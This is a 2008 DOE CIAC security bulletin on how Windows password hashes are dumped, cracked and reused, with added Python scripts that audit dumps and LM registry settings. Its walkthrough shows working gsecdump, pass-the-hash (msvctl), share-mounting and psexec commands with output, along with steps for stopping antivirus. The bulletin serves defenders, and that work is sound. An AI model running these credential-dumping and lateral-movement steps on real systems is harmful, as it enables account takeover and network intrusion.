-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

__________________________________________________________

             The U.S. Department of Energy
         Computer Incident Advisory Capability
__________________________________________________________

                      TECHNICAL BULLETIN

        Understanding Windows Hash Dumpers and Crackers

May 21, 2008 23:00 GMT                                 Number CIACTech08-002
______________________________________________________________________________

PROBLEM:   Windows hash dumper programs are both auditing and hacking
           tools. For auditing, they are used to find accounts with poor
           passwords. As a hacking tool, they are used to harvest password
           hashes that can be cracked offline, or used directly, without
           any cracking, to log in to other systems.

PLATFORM:  All Windows platforms

ABSTRACT:  Windows hash dumping tools are often spotlighted as hacker tools
           that can somehow magically extract Windows hashes and allow an
           intruder access to a system. In actuality, the hashes are there,
           in memory and on disk, where any administrator or SYSTEM level
           user can get at them. The tools just grab them and print them
           out. This paper describes how Windows hashes are created, how
           the hash dumpers get at them, and what can be done with the
           hashes.
______________________________________________________________________________

LINKS:
 CIAC BULLETIN:  http://www.ciac.org/ciac/techbull/CIACTech08-002.shtml
 OTHER LINKS:
   TrueSec: gsecdump:
     http://www.truesec.com/PublicStore/catalog/Downloads,223.aspx
   pwdump:  http://en.wikipedia.org/wiki/Pwdump
   Fgdump:  http://foofus.net/fizzgig/fgdump/
   TrueSec: msvctl:
     http://www.truesec.com/PublicStore/catalog/Downloads,223.aspx
   Sysinternals: psexec:
     http://technet.microsoft.com/en-us/sysinternals/bb795534.aspx
   Microsoft: Selecting Good Passwords:
     http://www.microsoft.com/technet/security/smallbusiness/prodtech/WindowsXP/select_sec_passwords.mspx
   John the Ripper:  http://www.openwall.com/john/
   Rainbow Tables:   http://en.wikipedia.org/wiki/Rainbow_table
   Disable LM Hash:  http://support.microsoft.com/kb/299656
______________________________________________________________________________

Windows hash dumping tools are often spotlighted as hacker tools that can
somehow magically extract Windows hashes and allow an intruder access to
a system. In actuality, the hashes are there, in memory or on disk, where
any administrator or SYSTEM level user can get at them. The tools just
grab them and print them out.

Password Hashes
===============

To understand Windows hash dumping tools, you first have to understand
how passwords are stored. When you create a password for an account, the
password is not stored on the system in clear text. It was apparent
early on that storing passwords in clear text was a bad idea: anyone who
got access to the password file would have access to every account on
the system. The trouble is that if the system does not have the
password, it cannot use it to authenticate a user's login. To get around
this problem, system developers hash the password with a one way hash
and store only the hash. When a person logs in, the password he types is
hashed and the result is compared to the stored hash. If they match, the
user is allowed in.
A one way hash is a function that converts an input string of any length
to a fixed length output string. It is one way because, given the output
string, there is no practical way to compute the input string. The only
way to find the input is to try candidate inputs until one produces the
output you are searching for. For this reason, if an intruder were to
steal the hash database, it could not be immediately used to log in; the
passwords would have to be cracked first. Cracking involves trying
candidate input strings until one generates the wanted hash. If the
password is sufficiently long and complex, it can take an intruder a
huge amount of time (millions of years for a sufficiently good password)
to do the cracking.

That is not to say that cracking programs have not found ways to shorten
that process. The most common is to use a dictionary. Most human
generated passwords are based on dictionary words, so hashing a
dictionary as a first attempt often gets results much faster than trying
random strings of characters.

Newer cracking programs use what are called Rainbow Tables. In its
simplest form, a Rainbow Table is a precomputed dictionary of hashes:
you generate and store the table beforehand and then just look up the
hash in the table to find the password. It is actually more complicated
than that, as you cannot store every possible hash; the table stores
chains of hashes and trades a little lookup computation for a much
smaller table. This method of attack became practical with the advent of
large, inexpensive hard drives to hold the tables.

One method for making Rainbow Tables difficult or impossible to use is
to salt the hash. Salting involves adding some random characters (the
salt) to the password before hashing it. Using a different salt with the
same password creates a different hash. You then save the salt alongside
the hash so it can be used when checking a login.
There are now many variations for every password, one for every possible
value of the salt, making it impractical to store Rainbow Tables large
enough for the method to work. While salt has been used in Unix password
hashes for many years, salt is not used in Windows hashes.

Windows Hashes
==============

Windows systems currently use one or more of four different
authentication methods:

  LanManager (LM)
  NT LanManager (NTLM, also called NTLMv1)
  NT LanManager version 2 (NTLMv2)
  Kerberos

These methods rely on two different stored hashes of the password, the
LM hash and the NT hash, and on different protocols for proving
possession of them over the network.

LanManager (LM) hashes are the oldest and least secure of the Windows
hashes. The password is first shifted to all upper case, padded with
nulls to 14 characters, and broken into two 7 character chunks. Each
chunk is then used, without salt, as a DES key to encrypt a fixed
constant, and the two results are concatenated. An intruder therefore
need only crack two seven character halves independently, and need only
consider upper case letters, numbers, and symbols. A password of seven
characters or fewer leaves the second half as the well known constant
for an empty chunk, which also gives away the password length. Cracking
LM hashes is very easy to do using today's technology.

Another difficulty with LM as the network authenticator is that its
challenge/response is weak: the stored hash is used as DES key material
to encrypt the 8 byte server challenge, and a captured exchange can be
cracked offline with little more effort than the stored hash itself.
This makes sniffing the network a practical way to obtain LM
credentials.

The NT LanManager (NTLMv1) hash is created by taking the MD4 hash of the
user's password encoded as Unicode (UTF-16). This is a much stronger
hash: the password is not changed to upper case, the full Unicode
character set can be used, and the password is not broken into shorter,
easier to crack chunks. It is still unsalted, so identical passwords
produce identical hashes on every system. Network logins with NTLMv1 use
a challenge/response mechanism, so the hash itself is never sent over
the network; the response is computed from the hash in the same DES
based way as LM, however, so captured NTLMv1 exchanges can also be
cracked offline.

NT LanManager version 2 (NTLMv2) uses the same NT hash but with a much
more secure (HMAC-MD5 based) challenge/response mechanism to
authenticate someone over the network.

Kerberos is used by Microsoft Windows Active Directory based security.
Note that the NT hash still matters in a Kerberos domain: it is also the
key used by the RC4-HMAC Kerberos encryption type, so a dumped NT hash
remains valuable even where Kerberos is the primary protocol.
To be backward compatible with older Windows systems, most new systems
come with all of these authentication mechanisms enabled. LM is enabled
to allow connections with Windows for Workgroups, Windows 95, and
Windows 98. If you are not sharing a network with these systems, you do
not need it and it should be disabled. NTLMv1 is needed to share a
network with Windows NT4 SP3 or earlier. Again, if you are not sharing a
network with this version of Windows, you do not need NTLMv1. NTLMv2 is
needed for connecting to Windows 2000 domains and Windows NT4 SP4 or
later. Windows Local and Group Policy settings are available to control
which of the LanMan versions a system will send and accept.

Hash Dumpers
============

Probably the most well known of the hash dumpers is pwdump. There are
currently seven versions of pwdump written by various people, but all do
essentially the same thing: they extract the LM and NTLM hashes from the
SAM database. The SAM is the part of the registry that holds the local
account information. The newer dumper families also try to dump the
cached credentials left behind by previous domain logins and the hashes
of the currently logged in users. The hashes in the SAM are encrypted
(with the SYSKEY, or boot key, which is itself stored in the SYSTEM
hive), but most of the hash dumpers know how to decrypt them, since the
ability to decrypt them must be available for the system to use them.

One thing to keep in mind is that you must be a privileged user to run
the hash dumpers and extract any hashes. They do not magically get
around the security system. That said, if you are logged into a
workstation and have administrator access to that workstation, and the
domain administrator is also logged into that workstation, you can get
the domain administrator's hash from memory using one of these hash
dumpers. This is why routine logins with domain administrator
credentials on ordinary workstations are so dangerous.

Pwdump
======

Pwdump is one of the oldest hash dumpers. It can dump the hashes in the
local registry to a file that can be used with Windows cracking programs
such as John the Ripper. Version 3 added the capability to dump hashes
from remote systems.
You must have admin access to the remote system to do this. It operates
by pushing code onto the remote system using the ADMIN$ share. It then
asks the Service Control Manager to install and run that code as a
service. To extract the hashes, you must have privileged access to the
SAM. As the Windows LSASS process runs with sufficient privileges,
pwdump uses a technique called DLL injection to load its code into the
LSASS process and get it run there. The code then extracts the password
hashes and stores them in the registry. The attacking system then
connects to the registry remotely and downloads the hashes.

Fgdump
======

Fgdump is the combination of several different hash dumping tools into
one executable to make it easier to dump the hashes. It includes
pwdump6, cachedump, and pstgdump. The following operational steps are
from the fgdump readme:

  Bind to a remote machine using IPC$ (or a list of machines)
  Stop AV, if it is installed
  Locate file shares exposed on that machine
  Find a writable share from the above list, bind it to a local drive
  Upload fgexec (used for remote command execution) for cachedump
  Run pwdump
  Run cachedump
  Run pstgdump
  Unbind the remote file share
  Restart AV if it was running
  Unbind from IPC$

Pwdump6 dumps the hashes in the SAM registry file as described above.
Cachedump dumps the cached domain credentials. When you do a domain
login to a Windows system, the system caches your credentials for
situations where the domain controller is not available. This allows you
to log in to a system when the domain controller is down; otherwise you
could only log in using local credentials. Pstgdump dumps the protected
storage, which includes things like saved Internet Explorer and Outlook
Express passwords.

Gsecdump
========

The newest kid on the block is gsecdump. Gsecdump is very similar in its
capabilities to Fgdump but without the remote system capabilities. To
run it on a remote system you must use the Sysinternals (now Microsoft)
psexec program.
Gsecdump dumps the SAM and the cache of domain credentials. In addition,
it can dump the LSA secrets, wireless keys, and the hashes of active
logon sessions.

msvctl
======

Another new program related to the hash dumpers is msvctl. This program
is essentially a login program that uses the hash instead of the
password to log in to a system, an attack commonly called
"pass-the-hash". As NTLM authentication is actually performed with the
hash rather than the password, this program dispenses with the password
and directly uses the hash to perform the login. No cracking is needed
at all, which is why even a strong password does not protect an account
whose hash has been dumped.

Disabling the LM Hash
=====================

To disable the LM hash, you must make two changes using the registry or
policy editors. The first disables the use of the LM response in network
logins (the LmCompatibilityLevel value under
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa). The second
prevents the LM hash from being saved on disk in the SAM (the NoLMHash
setting under the same Lsa key). These instructions are for Windows XP,
with the variations needed for Windows 2000 in parentheses.

Preventing the Use of the LM Hash in Network Logins
---------------------------------------------------

In the Control Panel, open Administrative Tools, then the Local Security
Policy tool. Under Local Policies, select Security Options. In the
Security Options list, double click "Network security: LAN Manager
authentication level" ("LAN Manager Authentication Level" in Windows
2000). You will see a drop down list of settings for what kinds of
authentication to use for network logins. If possible, set this to
"Send NTLMv2 response only\refuse LM & NTLM", which is the highest
setting. If you must use a lower setting, pick one that does not send LM
responses ("Send NTLM response only" or higher). Note that this setting
governs the network protocol only; it does not remove the LM hash from
the SAM, so a hash dumper will still find it.

Preventing the Storing of LM Hashes
-----------------------------------

The next step is to prevent the storing of LM hashes. Again, open the
Local Security Policy tool and select Security Options. In the Security
Options list, double click "Network security: Do not store LAN Manager
hash value on next password change". In the dialog box that appears,
select Enabled and click OK. You will then need to change all the
passwords on the system, because the setting only takes effect as each
password is changed; existing LM hashes remain in the SAM until then.
The new passwords will be stored in the SAM with the LM hash of a blank
password in the LM field and the real hash in the NT field. This
security option is not available in Windows 2000, so you will need to
edit the registry directly. In Windows 2000, open regedit and go to the
following registry key:

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

Add a subkey named NoLMHash to this key and reboot the system. (On
Windows XP, NoLMHash is instead a DWORD value set to 1 under the same
key, which is what the policy setting above writes.) More information
can be found in the following article:

  http://support.microsoft.com/kb/299656

Hash Dumpers in Use
===================

To get a feel for how hash dumpers are used, this section will go
through all the steps necessary to dump the hashes and crack them. First
run gsecdump -h to see the options:

  gsecdump [options]
  options:
    -h [ --help ]             show help
    -a [ --dump_all ]         dump all secrets
    -l [ --dump_lsa ]         dump lsa secrets
    -w [ --dump_wireless ]    dump mircosoft wireless connections
    -u [ --dump_usedhashes ]  dump hashes from active logon sessions
    -s [ --dump_hashes ]      dump hashes from SAM/AD

Using -a, it will dump whatever it can find on a system.
  F:\Projects\gsecdump>gsecdump -a
  info: you must run as LocalSystem to dump LSA secrets
  Microsoft wireless secrets:
  No interfaces found
  CIAC\orvis::aa7060d41533f2daa361a6c342c88aea:6faccd47f6ba2685521aacb32fd788f2:::
  CIAC\jonathon::a46139feaaf2b9f1af13362357cec994:621e7e6212259c99338ea3733ef47abd:::
  CIAC\BEATRICE$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392ad:::
  CIAC\BEATRICE$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392ad:::
  ASPNET(current):1003:aad3b435b51404eeaad3b435b51404ee:72f96de62387d4f07d0fc70067a1b711:::
  administrator:1004:aad3b435b51404eeaad3b435b51404ee:a18d154b7ac68fab46c077f64d2c6124:::
  Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant(current):1000:8e8fa1208e3659556970e6173d54580:e9302c669523de51c557a4c61c6b38d9:::
  SQLDebugger(current):1013:aad33235451404eeaad3b435b51404ee:c1f211f6d76d9755468b5e7ef806fcc1:::
  SUPPORT_388945a0(current):1002:aad3b435b51404eeaad3b435b51404ee:5a69566824cd4d2bbec5441b00930be9:::
  VUSR_VAP2(current):1006:aad3b435b51404eeaad3b435b51404ee:5bd277e41258752719a45a082a83c952:::

First, you see the hash of the logged in domain user CIAC\orvis (me).
Following that is a second logged in domain user, then the machine
account CIAC\BEATRICE$ (listed once per logon session), and then the
local accounts from the SAM. The fields are user name, RID, LM hash, and
NT hash, separated by colons. This system has LM hashes turned on, so
you see both the LM hash (between the second and third colon) and the NT
hash (between the third and fourth colon). On some of the accounts the
LM hash is disabled and is replaced with
aad3b435b51404eeaad3b435b51404ee, which is the LM hash of a blank
password. From this value you can see that the LM hash is actually two
independent hashes concatenated together: aad3b435b51404ee is the hash
of an empty 7 character chunk, so whenever it appears as the second half
of an account's LM hash, that password is 7 characters or fewer. For
some accounts, you may instead see all zeroes or
NO PASSWORD********************* for the disabled LM hash. Likewise,
31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so
the Guest account above has no password at all.

I see that Jonathon is logged into my system, so I have his hash. I
happen to know that his system is demonpc, so I can use the msvctl
program to log in as him.
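As an added example (not part of the CIAC bulletin), the following Python script performs the reading of dumper output just described, automatically: it parses user:RID:LM:NT::: lines, skips banners, and flags accounts that still have an LM hash, passwords of 7 characters or fewer (second LM half equal to the blank chunk), and empty NT passwords. The sample lines embedded in it are constructed for this example in the gsecdump/pwdump layout, reusing a few of the already anonymized values shown above.

```python
"""Added example (not from the CIAC bulletin): audit pass over pwdump /
gsecdump style output.  Sample input is constructed for this example."""
from typing import Dict, List

BLANK_LM_HALF = "aad3b435b51404ee"                # LM hash of an empty 7 byte chunk
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"     # NT hash of an empty password
ZERO_LM = "0" * 32                                # machine accounts, no LM hash
HEX = set("0123456789abcdef")

# Constructed sample dump (one banner line, a domain user, a machine
# account, and local SAM accounts in the dumper's "user:rid:lm:nt:::" form).
SAMPLE_DUMP = """\
info: you must run as LocalSystem to dump LSA secrets
CORP\\alice::aa7060d41533f2daa361a6c342c88aea:6faccd47f6ba2685521aacb32fd788f2:::
CORP\\WKS01$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392ad:::
bill(current):1013:db48291b8f012289aad3b435b51404ee:fb5cc42be52d38c1dd4725210b04c438:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:1004:NO PASSWORD*********************:a18d154b7ac68fab46c077f64d2c6124:::
"""


def parse_dump_line(line: str) -> Dict[str, str]:
    """Split one dump line into its fields; ValueError for non-hash lines."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("not a hash line: %r" % line)
    user = parts[0].split("(")[0]        # drop gsecdump's "(current)" marker
    return {"user": user, "rid": parts[1],
            "lm": parts[2].lower(), "nt": parts[3].lower()}


def audit_entry(entry: Dict[str, str]) -> List[str]:
    """Findings for one account, in a fixed order."""
    lm, nt = entry["lm"], entry["nt"]
    findings = []
    # An LM hash is present only if the field is 32 hex digits and is neither
    # the all-zero placeholder nor the blank-password hash.
    lm_present = (len(lm) == 32 and set(lm) <= HEX
                  and lm not in (ZERO_LM, BLANK_LM_HALF * 2))
    if lm_present:
        findings.append("LM hash stored")
        if lm[16:] == BLANK_LM_HALF:      # second chunk empty => short password
            findings.append("password is 7 characters or fewer")
    if nt == BLANK_NT:
        findings.append("empty password")
    return findings


def audit_dump(text: str) -> Dict[str, List[str]]:
    """Map account name -> findings, for accounts with at least one finding."""
    report: Dict[str, List[str]] = {}
    for line in text.splitlines():
        try:
            entry = parse_dump_line(line)
        except ValueError:
            continue                       # banner / informational lines
        findings = audit_entry(entry)
        if findings:
            report[entry["user"]] = findings
    return report


if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print("%-14s %s" % (user, "; ".join(findings)))
```

Run against a real dump, the "LM hash stored" finding is the quickest way to spot systems where the NoLMHash setting is missing or where passwords have not been changed since it was enabled.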
First, run the msvctl command as jonathon and have it start a command
shell:

  F:\>msvctl jonathon:1003:c222dae1d1379a51c22df6105198:7a306030abd444f34c2ab0181fde1033::: run cmd

This opens a command shell on my system using Jonathon's hash. If
Jonathon has administrative privileges on a remote system, I can use the
net commands to mount his drives or the psexec command to run gsecdump
on the remote system to gather even more password hashes. First, try the
net use command to see if I really have access to his system:

  F:\>net use r: \\demonpc\c$
  The command completed successfully.

  F:\>r:

  R:\>dir
   Volume in drive R has no label.
   Volume Serial Number is 04B4-5B64

   Directory of R:\

  09/21/2007  09:19 AM    <DIR>          7626d22404b5d683932dfb2d4fbed7
  04/15/2008  11:06 AM                 0 AUTOEXEC.BAT
  09/20/2007  12:46 PM                 0 CONFIG.SYS
  09/20/2007  01:05 PM    <DIR>          dell
  09/21/2007  10:51 AM    <DIR>          Documents and Settings
  04/09/2008  01:04 PM    <DIR>          Entrust Profile
  09/21/2007  01:47 PM    <DIR>          Extras
  10/11/2007  10:26 AM    <DIR>          llnl
  04/11/2008  12:04 PM    <DIR>          Program Files
  04/18/2008  02:53 PM    <DIR>          sqldeveloper
  04/15/2008  09:53 AM    <DIR>          WINDOWS
  09/20/2007  01:55 PM    <DIR>          WUTemp
                 2 File(s)              0 bytes
                10 Dir(s)  69,302,841,344 bytes free

Yes, I am there; Jonathon, you are 0wn3d. Here, you can see I have
mounted demonpc's C: drive as my R: drive and listed the contents. At
this point, I can read or change any files that he can read or change on
his system. If any system we run gsecdump on has been visited recently
by the domain administrator, we can get the domain administrator's hash
and use it to log in to the domain controller or any system in the
domain.

Using psexec to run gsecdump remotely from my connected command window:

  F:\>psexec \\demonpc -s -f -c ./gsecdump.exe -u

  PsExec v1.94 - Execute processes remotely
  Copyright (C) 2001-2008 Mark Russinovich
  Sysinternals - www.sysinternals.com

  PsExec could not start ./gsecdump.exe on demonpc:
  The system cannot find the file specified.

It didn't work because Jonathon's AV is killing gsecdump as soon as
psexec drops it on his system.
I walked over to Jonathon's system, logged in locally as administrator,
turned off his AV, went back to my system, and tried dumping his hashes
again:

  F:\>psexec \\demonpc -s -f -c ./gsecdump.exe -u

  PsExec v1.94 - Execute processes remotely
  Copyright (C) 2001-2008 Mark Russinovich
  Sysinternals - www.sysinternals.com

  CIAC\administrator::a7e78d4eae592d3f281667e9d738c5d9:78edf04f13a988fbc812b7758930b292:::
  CIAC\DEMONPC$::00000000000000000000000000000000:1af8d2cb4d9b99794471013687c5da19:::
  CIAC\DEMONPC$::00000000000000000000000000000000:1af8d2cb4d9b99794471013687c5da19:::
  ./gsecdump.exe exited on demonpc with error code 0.

This time it worked, and you can see the administrator account I had
just logged in with still present in his system's logon sessions. This
administrator's hash could now be used to log in to other systems,
including the domain controller.

Note: All hashes and user ids in this document have been changed to
protect the innocent.

Cracking Passwords
==================

To test passwords by cracking them to see if they are strong enough,
take the hashes dumped by the hash dumpers and feed them to a program
like John the Ripper. It will try several attacks on the passwords,
including a dictionary attack and brute force, to see if it can guess
the password. Any password it can guess in a reasonable amount of time
(a few days) should be considered totally insufficient, and the owner
should be pushed to change it to a stronger value. Not being able to
crack a password in a few days with John the Ripper is not proof against
cracking, but it will at least assure you that the password cannot be
cracked easily.

For example, the following hash for user bill has the password ripit.
This hash is in the file passwords.txt:

  bill:1013:db48291b8f012289aad3b435b51404ee:fb5cc42be52d38c1dd4725210b04c438:::

Cracking it with John the Ripper gives the following results.
  C:\John the Ripper\run>john-mmx passwords.txt
  Loaded 1 password hash (NT LM DES [64/64 BS MMX])
  RIPIT            (bill)
  guesses: 1  time: 0:00:00:15 (3)  c/s: 719788  trying: RIPH5 - RIPLM

Note from the results that it took only 15 seconds to crack that 5
character password. Results are also stored in the file john.pot:

  $LM$db48291b8f012289:RIPIT

From this, you can see that it cracked the LanMan hash, and that the
result is all upper case even though the actual password was lower case;
recovering the exact case from the NT hash is then a matter of trying a
handful of combinations. Note also that John only had to work on the
first half of the LM hash, db48291b8f012289, because the second half,
aad3b435b51404ee, is the known hash of an empty chunk.

If there are no LM hashes, there is an add-on (patch) for John the
Ripper that will crack NT hashes. However, it will be much slower,
because it has to crack the complete password at once rather than seven
characters at a time, and because the character set is no longer reduced
to upper case. That is, assuming you have a password that is more than 7
characters long.

Conclusion
==========

Hash dumping programs such as pwdump or gsecdump do not magically
capture Windows hashes; they must have sufficient privilege to do so,
which means administrator or SYSTEM rights. However, if you normally run
as administrator, you already have the rights to see these hashes, so it
should not be surprising that a tool can do so too.

Hash dumpers are valid administrative tools that you can use to search
for systems with the LM hash enabled or for accounts with poor
passwords. On the other hand, intruders use these tools to gather
password hashes for cracking, and to use directly for system logins to
expand their access. Reducing the number of systems on which
administrative, and especially domain administrator, logins take place
reduces the risk that an intruder who dumps one workstation's hashes
gets anything useful. The fact that these tools trigger antivirus
programs also reduces the risk that they can be used maliciously,
although not by much: as shown above, an administrator can simply turn
the AV off, and fgdump stops the AV itself as one of its normal steps.

Because it is so weak, you should disable the use and storing of LanMan
hashes on every system, as even a strong password can be cracked in a
few minutes because of the way the LM hash is constructed.
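The conclusion recommends using these tools to find systems with the LM hash still enabled; the two registry values behind the "Disabling the LM Hash" section can also be checked without dumping anything. The following Python script is an added example, not part of the CIAC bulletin: it reads saved "reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa" output collected from several hosts and reports which of them still send or accept LM responses (LmCompatibilityLevel below 4) or still store LM hashes (NoLMHash absent, whether as the XP style DWORD value or the Windows 2000 style subkey). The host names and query output embedded below are constructed for the example and assume the "name  REG_type  value" layout that reg.exe prints; the level meanings are Microsoft's documented ones.

```python
"""Added example (not from the CIAC bulletin): offline check of the two
LM related Lsa registry settings from saved "reg query" output.
Sample output and host names below are constructed for this example."""
import re
from typing import Dict, List

LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"

# Documented meanings of LmCompatibilityLevel (what is sent / accepted).
LM_COMPAT_LEVELS = {
    0: "Send LM & NTLM responses",
    1: "Send LM & NTLM - use NTLMv2 session security if negotiated",
    2: "Send NTLM response only",
    3: "Send NTLMv2 response only",
    4: "Send NTLMv2 response only/refuse LM",
    5: "Send NTLMv2 response only/refuse LM & NTLM",
}

# Constructed "reg query" output for three hosts: an XP box with defaults,
# a hardened box, and a Windows 2000 box using the NoLMHash *subkey*.
SAMPLE_HOSTS = {
    "xp-default": """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa
    Authentication Packages    REG_MULTI_SZ    msv1_0
    LmCompatibilityLevel    REG_DWORD    0x0
    NoLMHash    REG_DWORD    0x0
""",
    "hardened": """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa
    LmCompatibilityLevel    REG_DWORD    0x5
    NoLMHash    REG_DWORD    0x1
""",
    "w2k": """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa
    LmCompatibilityLevel    REG_DWORD    0x2

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\NoLMHash
""",
}

_VALUE_RE = re.compile(r"^\s*(\w+)\s+REG_(\w+)\s+(\S+)\s*$")


def parse_lsa_query(text: str) -> Dict[str, int]:
    """Extract DWORD values under the Lsa key; treat a NoLMHash subkey as set."""
    found: Dict[str, int] = {}
    for line in text.splitlines():
        m = _VALUE_RE.match(line)
        if m and m.group(2) == "DWORD":
            raw = m.group(3)
            found[m.group(1)] = int(raw, 16) if raw.lower().startswith("0x") else int(raw)
        elif line.strip().lower() == (LSA_KEY + "\\NoLMHash").lower():
            found["NoLMHash"] = 1           # Windows 2000 style: subkey present
    return found


def audit_lm_settings(text: str) -> List[str]:
    """Findings for one host's Lsa query output (empty list means hardened)."""
    settings = parse_lsa_query(text)
    findings = []
    level = settings.get("LmCompatibilityLevel")
    if level is None:
        findings.append("LmCompatibilityLevel not set; OS default applies, check it")
    elif level < 2:
        findings.append("sends LM responses on the network (level %d: %s)"
                        % (level, LM_COMPAT_LEVELS.get(level, "unknown")))
    elif level < 4:
        findings.append("still accepts LM responses from clients (level %d: %s)"
                        % (level, LM_COMPAT_LEVELS.get(level, "unknown")))
    if settings.get("NoLMHash", 0) != 1:
        findings.append("LM hashes are stored in the SAM (NoLMHash not set)")
    return findings


def audit_hosts(hosts: Dict[str, str]) -> Dict[str, List[str]]:
    """Map host -> findings, listing only hosts that need attention."""
    return {h: f for h, f in ((h, audit_lm_settings(t)) for h, t in hosts.items()) if f}


if __name__ == "__main__":
    for host, findings in audit_hosts(SAMPLE_HOSTS).items():
        print(host + ":")
        for f in findings:
            print("   - " + f)
```

Even a host that passes this check keeps its old LM hashes until every password has been changed, so combine it with the dump based check of the LM field above before declaring a system clean.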
--------------------------------------------------------------------------------

CIAC, the Computer Incident Advisory Capability, is the computer security
incident response team for the U.S. Department of Energy (DOE) and the
emergency backup response team for the National Institutes of Health (NIH).
CIAC is located at the Lawrence Livermore National Laboratory in Livermore,
California. CIAC is also a founding member of FIRST, the Forum of Incident
Response and Security Teams, a global organization established to foster
cooperation and coordination among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can
be contacted at:
    Voice:    +1 925-422-8193 (7x24)
    FAX:      +1 925-423-8002
    STU-III:  +1 925-423-2604
    E-mail:   ciac@ciac.org

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.

    World Wide Web:  http://www.ciac.org/
    Anonymous FTP:   ftp.ciac.org

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide organization.
A list of FIRST member organizations and their constituencies can be
obtained via WWW at http://www.first.org/.

This document was prepared as an account of work sponsored by an agency of
the United States Government. Neither the United States Government nor the
University of California nor any of their employees, makes any warranty,
express or implied, or assumes any legal liability or responsibility for
the accuracy, completeness, or usefulness of any information, apparatus,
product, or process disclosed, or represents that its use would not
infringe privately owned rights.
Reference herein to any specific commercial products, process, or service
by trade name, trademark, manufacturer, or otherwise, does not necessarily
constitute or imply its endorsement, recommendation or favoring by the
United States Government or the University of California. The views and
opinions of authors expressed herein do not necessarily state or reflect
those of the United States Government or the University of California, and
shall not be used for advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

S-213: Nukedit 'email' Parameter Vulnerability
S-214: SurgeMail and WebMail 'Page' Command Vulnerability
S-215: Symantec Backup Exec Scheduler ActiveX Control Multiple Vulnerabilities
S-216: Juniper Networks Secure Access 2000 'rdremediate.cgi' Vulnerability
S-217: Drupal Multiple HTML Vulnerabilities
S-218: gd Security Update
S-219: Juniper Networks Secure Access 2000 Web Root Path Vulnerability
S-220: PHP-Nuke My_eGallery Module 'gid' Parameter Vulnerability
S-221: Learn2 STRunner ActiveX Control Vulnerabilities
S-222: Evolution Security Update

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSDSqikrr52ee8YsTEQKB9QCdGTOH7Wdi8bGUP6nWnE1hcCswJXAAoPao
ndTeJUyJEF3sz5AVJln+D3W6
=a8aS
-----END PGP SIGNATURE-----